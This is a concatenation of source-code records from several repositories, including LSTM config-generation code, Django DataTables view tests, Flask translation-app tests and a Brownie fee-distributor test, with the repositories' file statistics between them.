    component_nodes.append("component-node name={0}_o_t component={0}_o input=Sum({0}_o1, {0}_o2)".format(name))
    component_nodes.append("# h_t")
    component_nodes.append("component-node name={0}_h_t component={0}_h input={0}_c_t".format(name))
    component_nodes.append("# g_t")
    component_nodes.append("component-node name={0}_g1 component={0}_W_c-xr input=Append({1}, IfDefined(Offset({0}_{2}, {3})))".format(name, input_descriptor, recurrent_connection, lstm_delay))
    component_nodes.append("component-node name={0}_g_t component={0}_g input={0}_g1".format(name))
    component_nodes.append("# parts of c_t")
    component_nodes.append("component-node name={0}_c1_t component={0}_c1 input=Append({0}_f_t, {1})".format(name, c_tminus1_descriptor))
    component_nodes.append("component-node name={0}_c2_t component={0}_c2 input=Append({0}_i_t, {0}_g_t)".format(name))
    component_nodes.append("# m_t")
    component_nodes.append("component-node name={0}_m_t component={0}_m input=Append({0}_o_t, {0}_h_t)".format(name))
    # add the recurrent connections
    if (add_recurrent_projection and add_non_recurrent_projection):
        # both projections share one affine; a dim-range-node slices out r_t
        components.append("# projection matrices : Wrm and Wpm")
        components.append("component name={0}_W-m type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3}".format(name, cell_dim, recurrent_projection_dim + non_recurrent_projection_dim, ng_affine_options))
        components.append("component name={0}_r type=ClipGradientComponent dim={1} clipping-threshold={2} norm-based-clipping={3} ".format(name, recurrent_projection_dim, clipping_threshold, norm_based_clipping))
        component_nodes.append("# r_t and p_t")
        component_nodes.append("component-node name={0}_rp_t component={0}_W-m input={0}_m_t".format(name))
        component_nodes.append("dim-range-node name={0}_r_t_preclip input-node={0}_rp_t dim-offset=0 dim={1}".format(name, recurrent_projection_dim))
        component_nodes.append("component-node name={0}_r_t component={0}_r input={0}_r_t_preclip".format(name))
        output_descriptor = '{0}_rp_t'.format(name)
        output_dim = recurrent_projection_dim + non_recurrent_projection_dim
    elif add_recurrent_projection:
        components.append("# projection matrices : Wrm")
        components.append("component name={0}_Wrm type=NaturalGradientAffineComponent input-dim={1} output-dim={2} {3}".format(name, cell_dim, recurrent_projection_dim, ng_affine_options))
        components.append("component name={0}_r type=ClipGradientComponent dim={1} clipping-threshold={2} norm-based-clipping={3} ".format(name, recurrent_projection_dim, clipping_threshold, norm_based_clipping))
        component_nodes.append("# r_t")
        component_nodes.append("component-node name={0}_r_t_preclip component={0}_Wrm input={0}_m_t".format(name))
        component_nodes.append("component-node name={0}_r_t component={0}_r input={0}_r_t_preclip".format(name))
        output_descriptor = '{0}_r_t'.format(name)
        output_dim = recurrent_projection_dim
    else:
        # no projection: clip m_t directly and use it as the layer output
        components.append("component name={0}_r type=ClipGradientComponent dim={1} clipping-threshold={2} norm-based-clipping={3} ".format(name, cell_dim, clipping_threshold, norm_based_clipping))
        component_nodes.append("component-node name={0}_r_t component={0}_r input={0}_m_t".format(name))
        output_descriptor = '{0}_r_t'.format(name)
        output_dim = cell_dim
    return {
        'descriptor': output_descriptor,
        'dimension':output_dim
    }
def AddClstmLayer(config_lines,
                  name, input, cell_dim,
                  recurrent_projection_dim = 0,
                  non_recurrent_projection_dim = 0,
                  clipping_threshold = 1.0,
                  norm_based_clipping = "false",
                  ng_per_element_scale_options = "",
                  ng_affine_options = "",
                  lstm_delay = -1,
                  rates = [1]):
    """Add a CLSTM layer to the config.

    The original body was an exact line-for-line duplicate of AddLstmLayer,
    so this now delegates to it; see AddLstmLayer for parameter semantics.

    NOTE(review): 'rates' is accepted for interface compatibility but was never
    referenced by the original implementation either — kept unused deliberately.
    Returns {'descriptor': ..., 'dimension': ...} for the layer output.
    """
    return AddLstmLayer(config_lines, name, input, cell_dim,
                        recurrent_projection_dim = recurrent_projection_dim,
                        non_recurrent_projection_dim = non_recurrent_projection_dim,
                        clipping_threshold = clipping_threshold,
                        norm_based_clipping = norm_based_clipping,
                        ng_per_element_scale_options = ng_per_element_scale_options,
                        ng_affine_options = ng_affine_options,
                        lstm_delay = lstm_delay)
| 65.505682
| 219
| 0.72825
| 3,175
| 23,058
| 5.014488
| 0.055118
| 0.069091
| 0.087934
| 0.087432
| 0.922681
| 0.920545
| 0.899755
| 0.890836
| 0.882608
| 0.870611
| 0
| 0.022837
| 0.13401
| 23,058
| 351
| 220
| 65.692308
| 0.774489
| 0.017348
| 0
| 0.817518
| 0
| 0.189781
| 0.409848
| 0.102274
| 0
| 0
| 0
| 0
| 0.007299
| 1
| 0.032847
| false
| 0.021898
| 0.021898
| 0
| 0.080292
| 0.007299
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
877204df4c5895f120b1c3ab75caef019805c5c1
| 13,431
|
py
|
Python
|
tests/test_views.py
|
randlet/django-listable
|
545b460b22238bcbabbb11e9b5b9255f3df696ca
|
[
"BSD-3-Clause"
] | 11
|
2015-03-25T01:35:44.000Z
|
2021-05-11T14:17:24.000Z
|
tests/test_views.py
|
randlet/django-listable
|
545b460b22238bcbabbb11e9b5b9255f3df696ca
|
[
"BSD-3-Clause"
] | 7
|
2015-11-21T15:01:37.000Z
|
2021-09-03T13:37:13.000Z
|
tests/test_views.py
|
randlet/django-listable
|
545b460b22238bcbabbb11e9b5b9255f3df696ca
|
[
"BSD-3-Clause"
] | 7
|
2016-02-14T15:56:41.000Z
|
2021-04-23T08:41:15.000Z
|
import codecs
import datetime
import json
import sys
from django.db.models import Q
from django.test import Client, TestCase
from django.urls import reverse
from django.utils import timezone
from listable import settings as lisettings
from staff.models import INACTIVE, Staff
sys.path.append("listable-demo")
_reader = codecs.getreader("utf-8")
class TestViews(TestCase):
fixtures = ["staff_data.json"]
def test_basic_get(self):
    """A plain GET of the staff list page renders successfully."""
    response = Client().get(reverse("staff-list"))
    self.assertEqual(response.status_code, 200)
def test_data_load(self):
    """An AJAX DataTables request returns the requested number of rows and the total count."""
    num_records = 23
    query = "?sEcho=1&iColumns=8&sColumns=&iDisplayStart=1&iDisplayLength={0}".format(num_records)
    response = Client().get(reverse("staff-list") + query,
                            HTTP_X_REQUESTED_WITH='XMLHttpRequest')
    payload = json.loads(response.content.decode('utf-8'))
    data = payload.pop("aaData")
    self.assertEqual(len(data), num_records)
    self.assertEqual(payload['iTotalRecords'], Staff.objects.count())
def test_filter_select(self):
    """Test filtering based on a select widget (sSearch_2=inactive on the status column)."""
    client = Client()
    url = reverse("staff-list")+"?sEcho=1&iColumns=8&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&mDataProp_7=7&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=inactive&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&sSearch_7=&bRegex_7=false&bSearchable_7=true&iSortingCols=0&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&bSortable_7=true&sRangeSeparator=~&_=1414439607637"
    response = client.get(url, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
    payload = json.loads(response.content.decode('utf-8'))
    data = payload.pop("aaData")
    # expected row count: fixture staff whose 'active' field is INACTIVE
    num_records = Staff.objects.filter(active=INACTIVE).count()
    self.assertEqual(len(data), num_records)
def test_filter_extra_select(self):
    """Test filtering based on a extra clause (e.g. for Generic Foreign Key content)."""
    client = Client()
    search_term = "a3"
    # the term is injected into sSearch_7, the column backed by the extra clause
    url = reverse("staff-list")+"?sEcho=1&iColumns=8&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&mDataProp_7=7&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&sSearch_7={search_term}&bRegex_7=false&bSearchable_7=true&iSortingCols=0&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&bSortable_7=true&sRangeSeparator=~&_=1414439607640".format(search_term=search_term)
    response = client.get(url, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
    payload = json.loads(response.content.decode('utf-8'))
    data = payload.pop("aaData")
    # expected count computed in Python against the related generic object's name
    num_records = len([1 for s in Staff.objects.all() if search_term in s.generic_object.name.lower()])
    self.assertTrue(len(data) > 0)
    self.assertEqual(payload["iTotalDisplayRecords"], num_records)
def test_filter_multi_select(self):
    """Test filtering based on a multi-select widget (regex OR of contract types in sSearch_9)."""
    client = Client()
    # sSearch_9 carries a URL-encoded regex: ^(Other|Part%20Time%20Contract)$ with bRegex_9=true
    url = reverse("staff-list") + "?sEcho=7&iColumns=10&sColumns=&iDisplayStart=0&iDisplayLength=100&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&mDataProp_7=7&mDataProp_8=8&mDataProp_9=9&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&sSearch_7=&bRegex_7=false&bSearchable_7=true&sSearch_8=&bRegex_8=false&bSearchable_8=true&sSearch_9=%5E(Other%7CPart%2520Time%2520Contract)%24&bRegex_9=true&bSearchable_9=true&iSortCol_0=1&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&bSortable_7=true&bSortable_8=true&bSortable_9=true&sRangeSeparator=~&_=1467142887399"
    response = client.get(url, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
    payload = json.loads(response.content.decode('utf-8'))
    data = payload.pop("aaData")
    # expected count: ORM equivalent of the regex OR over contract type names
    num_records = Staff.objects.filter(Q(contract_type__name="Other") | Q(contract_type__name="Part Time Contract")).count()
    self.assertEqual(len(data), num_records)
def test_filter_date(self):
    """Test filtering based on a date column (sSearch_10=10+Jun+2010 matches the whole day)."""
    cur_tz = timezone.get_current_timezone()
    test_date = '2010-06-10 12:34:56'
    test_staff = Staff.objects.get(pk=10)
    # NOTE(review): cur_tz.localize is pytz-style; under a zoneinfo-based Django
    # timezone this would raise AttributeError — confirm the project's tz backend.
    test_date_obj = cur_tz.localize(datetime.datetime.strptime(test_date, '%Y-%m-%d %H:%M:%S'))
    test_staff.date_hired = test_date_obj
    test_staff.save()
    client = Client()
    url = reverse("staff-list") + "?sEcho=5&iColumns=11&sColumns=&iDisplayStart=0&iDisplayLength=100&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&mDataProp_7=7&mDataProp_8=8&mDataProp_9=9&mDataProp_10=10&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&sSearch_7=&bRegex_7=false&bSearchable_7=true&sSearch_8=&bRegex_8=false&bSearchable_8=true&sSearch_9=%5E(.*)%24&bRegex_9=true&bSearchable_9=true&sSearch_10=10+Jun+2010&bRegex_10=false&bSearchable_10=true&iSortCol_0=1&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&bSortable_7=true&bSortable_8=true&bSortable_9=true&bSortable_10=true&sRangeSeparator=~&_=1467146526014"
    response = client.get(url, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
    payload = json.loads(response.content.decode('utf-8'))
    data = payload.pop("aaData")
    # expected count: hires anywhere within the test day [00:00:00, 23:59:59]
    num_records = Staff.objects.filter(date_hired__range=[test_date_obj.replace(hour=0, minute=0, second=0), test_date_obj.replace(hour=23, minute=59, second=59)]).count()
    self.assertEqual(len(data), num_records)
def test_filter_plain(self):
    """Filter the staff list through a plain text column input (sSearch_3)."""
    search_term = "Amet"
    # Expected count comes straight from the ORM, independent of the view.
    expected_count = Staff.objects.filter(department__name=search_term).count()
    query = "?sEcho=1&iColumns=8&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&mDataProp_7=7&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3={search_term}&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&sSearch_7=&bRegex_7=false&bSearchable_7=true&iSortingCols=0&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&bSortable_7=true&sRangeSeparator=~&_=1414439607643".format(search_term=search_term)
    http_client = Client()
    reply = http_client.get(reverse("staff-list") + query, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
    body = json.loads(reply.content.decode('utf-8'))
    rows = body.pop("aaData")
    # Some rows must come back, and the unfiltered total must match the ORM.
    self.assertGreater(len(rows), 0)
    self.assertEqual(body["iTotalDisplayRecords"], expected_count)
def test_filter_iterable(self):
    """Filter the staff list on column 1 (last name) via sSearch_1.

    NOTE(review): the original docstring said "plain text input", a
    copy-paste of the previous test; the method name suggests this column
    is backed by an iterable column definition — confirm against the view.
    """
    client = Client()
    search_term = "Abbott"
    # Boilerplate datatables query; the relevant part is sSearch_1={search_term}.
    url = reverse("staff-list")+"?sEcho=19&iColumns=8&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&mDataProp_7=7&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1={search_term}&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4=&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&sSearch_7=&bRegex_7=false&bSearchable_7=true&iSortingCols=0&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&bSortable_7=true&sRangeSeparator=~&_=1414439607645".format(search_term=search_term)
    response = client.get(url, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
    payload = json.loads(response.content.decode('utf-8'))
    data = payload.pop("aaData")
    # Ground truth: direct ORM match on last_name.
    num_records = Staff.objects.filter(last_name=search_term).count()
    self.assertTrue(len(data) > 0)
    self.assertEqual(payload["iTotalDisplayRecords"], num_records)
def test_order_basic_with_search(self):
    """Combine a column filter (position, sSearch_4) with descending pk ordering
    (iSortCol_0=0, sSortDir_0=desc) and check the first page of pks matches
    the equivalent ORM query."""
    client = Client()
    search_term = "Maiores"
    url = reverse("staff-list")+"?sEcho=19&iColumns=8&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&mDataProp_7=7&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4={search_term}&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&sSearch_7=&bRegex_7=false&bSearchable_7=true&iSortingCols=1&iSortCol_0=0&sSortDir_0=desc&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&bSortable_7=true&sRangeSeparator=~&_=1414439607645".format(search_term=search_term)
    response = client.get(url, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
    payload = json.loads(response.content.decode('utf-8'))
    data = payload.pop("aaData")
    # Expected first page: matching staff, newest pk first, capped at the page size.
    pks = Staff.objects.filter(position__name=search_term).order_by('-pk').values_list("pk", flat=True)[:lisettings.LISTABLE_PAGINATE_BY]
    # Column 0 of each returned row holds the pk (as a string).
    payload_pks = [int(x[0]) for x in data]
    self.assertListEqual(list(pks), payload_pks)
def test_order_iterable_with_search(self):
    """Combine a column filter (position, sSearch_4) with ascending ordering
    on column 1 and compare the returned names to an ORM query ordered by
    last_name then first_name.

    NOTE(review): the original docstring said "Test that filtering fails",
    which contradicts the body — the assertions verify ordering succeeds.
    """
    client = Client()
    search_term = "Maiores"
    url = reverse("staff-list")+"?sEcho=19&iColumns=8&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&mDataProp_7=7&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4={search_term}&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&sSearch_7=&bRegex_7=false&bSearchable_7=true&iSortingCols=1&iSortCol_0=1&sSortDir_0=asc&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&bSortable_7=true&sRangeSeparator=~&_=1414439607645".format(search_term=search_term)
    response = client.get(url, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
    payload = json.loads(response.content.decode('utf-8'))
    data = payload.pop("aaData")
    # Expected ordering mirrors what column 1 displays: Staff.name().
    staff = Staff.objects.filter(position__name=search_term).order_by('last_name', "first_name")[:lisettings.LISTABLE_PAGINATE_BY]
    names = [s.name() for s in staff]
    payload_names = [x[1] for x in data]
    self.assertListEqual(names, payload_names)
| 79.946429
| 1,066
| 0.77202
| 2,041
| 13,431
| 4.810877
| 0.096521
| 0.122212
| 0.017313
| 0.018332
| 0.829209
| 0.818923
| 0.799674
| 0.784194
| 0.778694
| 0.755474
| 0
| 0.06011
| 0.094557
| 13,431
| 167
| 1,067
| 80.42515
| 0.747307
| 0.081975
| 0
| 0.431193
| 0
| 0.073395
| 0.584262
| 0.540321
| 0
| 0
| 0
| 0
| 0.12844
| 1
| 0.091743
| false
| 0
| 0.091743
| 0
| 0.201835
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5e490f08f171419a6bd5454e0daa2b5af13e5ad1
| 3,549
|
py
|
Python
|
April/mariantranslation/test_app.py
|
adomaatobrah/simplewebpage
|
41b3d78d03d15d7aaac5dda1a592c7e850bb70d2
|
[
"MIT"
] | null | null | null |
April/mariantranslation/test_app.py
|
adomaatobrah/simplewebpage
|
41b3d78d03d15d7aaac5dda1a592c7e850bb70d2
|
[
"MIT"
] | null | null | null |
April/mariantranslation/test_app.py
|
adomaatobrah/simplewebpage
|
41b3d78d03d15d7aaac5dda1a592c7e850bb70d2
|
[
"MIT"
] | null | null | null |
import app
def test_completion():
    """Hit /result for a fixed sentence and assert the full JSON payload.

    Bug fix: the query string previously contained the literal character
    '©' ("...skip=true©=false") — an HTML-entity mangling of '&copy=false'
    (the '&copy' run was decoded to ©), which silently dropped the 'copy'
    parameter. Restored the intended '&copy=false'.
    """
    # Golden response captured from a known-good run of the model.
    result_should_be = {'expected': ' It was a dark and stormy night.', 'newEnglish': ' The night was dark and stormy.', 'predictions': [['\xa0', '\xa0It', '\xa0"', '\xa0-', '\xa0*', '\xa0♫', '\xa0it', '\xa0The', '\xa0A', '\xa0This'], ['\xa0night', '\xa0evening', '\xa0day', '\xa0nights', '\xa0darkness', '\xa0dark', '\xa0time', '\xa0whole', '\xa0Night', '\xa0place'], ['\xa0was', '\xa0is', '\xa0had', '\xa0of', ',', '\xa0it', '\xa0came', '\xa0in', '\xa0has', '\xa0I'], ['\xa0dark', '\xa0a', '\xa0black', '\xa0so', '\xa0darkness', '\xa0both', '\xa0night', '\xa0deep', '\xa0', '\xa0long'], ['\xa0and', ',', '.', '...', 'er', '\xa0with', '\xa0or', ';', '\xa0in', 'est'], ['\xa0storm', '\xa0temp', '\xa0thunder', '\xa0a', '\xa0rainy', '\xa0heavy', '\xa0has', '\xa0severe', '\xa0', '\xa0was'], ['y', 'ful', '.', 'ous', 'ily', 'ier', 'ly', 'ing', 'iness', 'some'], ['.', '</s>', ',', '!', ';', '\xa0and', '...', ':', '."', '\xa0'], ['</s>', '\xa0"', '\xa0—', "\xa0'", '\xa0It', '\xa0I', '\xa0-', '\xa0', '.', '...']], 'score': -0.801, 'tokens': ['\xa0The', '\xa0night', '\xa0was', '\xa0dark', '\xa0and', '\xa0storm', 'y', '.', '</s>'], 'translation': ' The night was dark and stormy.'}
    with app.app.test_client() as client:
        response = client.get('/result?english=It+was+a+dark+and+stormy+night.&start=+The+night&skip=true&copy=false')
        print(response.get_json())
        assert response.get_json() == result_should_be
        print("passed")
def test_alternatives():
    """Ask /rearrange (auto mode) for sentence alternatives and compare
    the JSON body against a fixed golden list."""
    expected = {
        "alternatives": [
            " The night was dark and stormy.",
            " And it was a dark and stormy night.",
            " A dark and stormy night.",
            " Dark and stormy night."
        ]}
    with app.app.test_client() as http:
        reply = http.get('/rearrange?english=It+was+a+dark+and+stormy+night.&start=&auto=true')
        body = reply.get_json()
        print(body)
        assert body == expected
        print("passed")
def test_reorder():
    """Hit /rearrange (auto=false) with an explicit start token and assert
    the full JSON payload against a golden capture."""
    # Golden response; NOTE the same payload as test_completion's — both
    # routes converge on the same model output for this sentence.
    result_should_be = {'expected': ' It was a dark and stormy night.', 'newEnglish': ' The night was dark and stormy.', 'predictions': [['\xa0', '\xa0It', '\xa0"', '\xa0-', '\xa0*', '\xa0♫', '\xa0it', '\xa0The', '\xa0A', '\xa0This'], ['\xa0night', '\xa0evening', '\xa0day', '\xa0nights', '\xa0darkness', '\xa0dark', '\xa0time', '\xa0whole', '\xa0Night', '\xa0place'], ['\xa0was', '\xa0is', '\xa0had', '\xa0of', ',', '\xa0it', '\xa0came', '\xa0in', '\xa0has', '\xa0I'], ['\xa0dark', '\xa0a', '\xa0black', '\xa0so', '\xa0darkness', '\xa0both', '\xa0night', '\xa0deep', '\xa0', '\xa0long'], ['\xa0and', ',', '.', '...', 'er', '\xa0with', '\xa0or', ';', '\xa0in', 'est'], ['\xa0storm', '\xa0temp', '\xa0thunder', '\xa0a', '\xa0rainy', '\xa0heavy', '\xa0has', '\xa0severe', '\xa0', '\xa0was'], ['y', 'ful', '.', 'ous', 'ily', 'ier', 'ly', 'ing', 'iness', 'some'], ['.', '</s>', ',', '!', ';', '\xa0and', '...', ':', '."', '\xa0'], ['</s>', '\xa0"', '\xa0—', "\xa0'", '\xa0It', '\xa0I', '\xa0-', '\xa0', '.', '...']], 'score': -0.801, 'tokens': ['\xa0The', '\xa0night', '\xa0was', '\xa0dark', '\xa0and', '\xa0storm', 'y', '.', '</s>'], 'translation': ' The night was dark and stormy.'}
    with app.app.test_client() as client:
        # %C2%A0 is a URL-encoded non-breaking space preceding "night".
        response = client.get('/rearrange?english=+It+was+a+dark+and+stormy+night.&start=%C2%A0night&auto=false')
        print(response.get_json())
        assert response.get_json() == result_should_be
        print("passed")
if __name__ == "__main__":
    # Run the smoke tests only when this file is executed directly;
    # previously they ran unconditionally at import time.
    test_completion()
    test_alternatives()
    test_reorder()
| 91
| 1,180
| 0.541843
| 385
| 3,549
| 4.935065
| 0.246753
| 0.047895
| 0.088947
| 0.075789
| 0.905263
| 0.895263
| 0.882632
| 0.87
| 0.87
| 0.851053
| 0
| 0.048521
| 0.152156
| 3,549
| 38
| 1,181
| 93.394737
| 0.581589
| 0
| 0
| 0.451613
| 0
| 0.096774
| 0.498027
| 0.065389
| 0
| 0
| 0
| 0
| 0.096774
| 1
| 0.096774
| false
| 0.096774
| 0.032258
| 0
| 0.129032
| 0.193548
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
5e967d54e5ca18686095819db28a9e09a1451c1c
| 143
|
py
|
Python
|
yah/_http/defaults.py
|
sunsx0/yah
|
c073015dfa1fb2b5232c3ec4a9b9dbae571f7053
|
[
"MIT"
] | null | null | null |
yah/_http/defaults.py
|
sunsx0/yah
|
c073015dfa1fb2b5232c3ec4a9b9dbae571f7053
|
[
"MIT"
] | null | null | null |
yah/_http/defaults.py
|
sunsx0/yah
|
c073015dfa1fb2b5232c3ec4a9b9dbae571f7053
|
[
"MIT"
] | null | null | null |
from .aio_http import AioHttpRequestMaker
from .client import Client
def create_client() -> Client:
    """Build the default :class:`Client`, backed by an aiohttp request maker."""
    request_maker = AioHttpRequestMaker()
    return Client(request_maker)
| 20.428571
| 41
| 0.783217
| 16
| 143
| 6.875
| 0.5625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.13986
| 143
| 6
| 42
| 23.833333
| 0.894309
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
5ed4700b114e2adc71717dccfab50b4ac7087ebd
| 3,317
|
py
|
Python
|
tests/unitary/FeeDistributor/test_claim_many.py
|
ribbon-finance/ribbonomics
|
fb0034137aa8c0dfdd5e25c193b11a9e0099b78b
|
[
"MIT"
] | 2
|
2022-01-13T21:11:30.000Z
|
2022-03-10T08:20:42.000Z
|
tests/unitary/FeeDistributor/test_claim_many.py
|
ribbon-finance/ribbonomics
|
fb0034137aa8c0dfdd5e25c193b11a9e0099b78b
|
[
"MIT"
] | null | null | null |
tests/unitary/FeeDistributor/test_claim_many.py
|
ribbon-finance/ribbonomics
|
fb0034137aa8c0dfdd5e25c193b11a9e0099b78b
|
[
"MIT"
] | 2
|
2022-01-30T20:54:55.000Z
|
2022-03-05T17:49:19.000Z
|
from brownie import ZERO_ADDRESS
WEEK = 86400 * 7
def test_claim_many(alice, bob, charlie, accounts, chain, voting_escrow, ve_rbn_rewards, fee_distributor, weth, token):
    """claim_many for three accounts pays out exactly what three individual
    claim() calls would (ETH funding path)."""
    amount = 1000 * 10 ** 18
    # Give each account tokens and an 8-week voting-escrow lock so all
    # three accrue a fee share.
    for acct in (alice, bob, charlie):
        token.approve(voting_escrow, amount * 10, {"from": acct})
        token.transfer(acct, amount, {"from": alice})
        voting_escrow.create_lock(amount, chain.time() + 8 * WEEK, {"from": acct})
    chain.sleep(WEEK)
    chain.mine()
    start_time = int(chain.time())
    chain.sleep(WEEK * 5)
    # The fee_distributor fixture is a factory; deploy it anchored at start_time.
    fee_distributor = fee_distributor(t=start_time)
    # Fund the distributor with plain ETH, then checkpoint across a week
    # so the fees are attributed to elapsed epochs.
    accounts[3].transfer(fee_distributor, "10 ether")
    fee_distributor.checkpoint_token()
    chain.sleep(WEEK)
    fee_distributor.checkpoint_token()
    # claim_many takes a fixed-size list; pad to 20 entries with ZERO_ADDRESS.
    fee_distributor.claim_many([alice, bob, charlie] + [ZERO_ADDRESS] * 17, {"from": alice})
